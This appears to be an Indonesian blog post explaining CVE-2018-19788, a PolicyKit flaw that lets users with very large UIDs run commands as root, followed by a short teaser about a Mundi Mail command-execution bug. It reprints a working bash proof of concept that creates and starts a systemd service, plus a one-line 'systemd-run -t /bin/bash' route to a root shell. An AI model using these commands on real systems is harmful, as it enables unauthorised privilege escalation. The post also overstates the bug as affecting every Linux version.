Bug Konyol di Linux, user biasa bisa Jadi Setara Root!?

Anggapan bahwa Linux itu Aman, itu relatif, jangan ditelan mentah-mentah. Kini ada lagi satu bug konyol yang menimpa semua versi Linux yang beredar saat ini. Seorang user biasa bisa mengeksekusi perintah apapun, seperti halnya root!

Bug ini adalah bug di software PolicyKit (atau polkit), sebuah aplikasi low level di hampir semua sistem operasi Unix-like yang mendefinisikan kebijakan akses dan kebijakan kewenangan masing-masing user yang ada disistem. Bug ini diidentifikasi dari CVE nomor 2018-19788. CVE-2018-19788 ini menimpa PolicyKit versi 0.115 yang dipakai disemua distro linux seperti Red Hat dan turunannya, Debian dan turunannya.

Apa Sih Bug Yang Ditemukan?

Ternyata gan, jika sebuah user diberi UID (user ID) yang nilainya lebih dari maksimum nilai sebuah integer di Linux (INT_MAX), maka dia bisa mengeksekusi perintah apapun di Linux. INT_MAX disini kira-kira sekitar 2147483647 atau 0x7FFFFFFF dalam bilangan Heksa.

Jika UID dari user itu lebih dari angka 2147483647, user tersebut akan punya kewenangan yang tidak terbatas karena PolicyKit gagal mengantisipasi kejadian seperti itu.

Seperti yang dijelaskan oleh om 0xm1rch dalam Proof of Conceptnya, dalam exploit yang dia bikin, dia sukses membuat sebuah user dengan UID 4000000000 bisa mengeksekusi apapun. 😀

#!/bin/bash
# PoC for CVE-2018-19788
# Rich Mirch

cat >woot.service<<EOF
[Unit]
Description=Woot
[Service]
Type=notify
ExecStart=/bin/bash -c "echo woot \$(id)|wall"
KillMode=process
Restart=on-failure
RestartSec=42s
[Install]
WantedBy=multi-user.target
EOF

systemctl link $PWD/woot.service
systemctl start woot

# @paragonsec discovered a much cleaner method to get root. Use this instead
# https://twitter.com/paragonsec/status/1071152249529884674
# systemd-run -t /bin/bash

Solusi?

Upgrade lah gan. emang mau ngapain lagi. 

Waspada Bug di Mundi Mail, Lagi





Baru saja saya mendapat informasi dari teman tentang vulnerabilities pada aplikasi Mundi. Mundi, adalah aplikasi pengelola e-mail yang digunakan oleh pelbagai perusahaan/institusi.

Kali ini, Mundi yang ngebug adalah Mundi 0.8.2 (mungkin sebelumnya juga). Cukup fatal tampaknya, karena penyerang bisa melakukan eksekusi perintah secara remote dan berulang. Kesalahan ini diakibatkan pada Input Validation yang kurang sempurna. Continue reading Waspada Bug di Mundi Mail, Lagi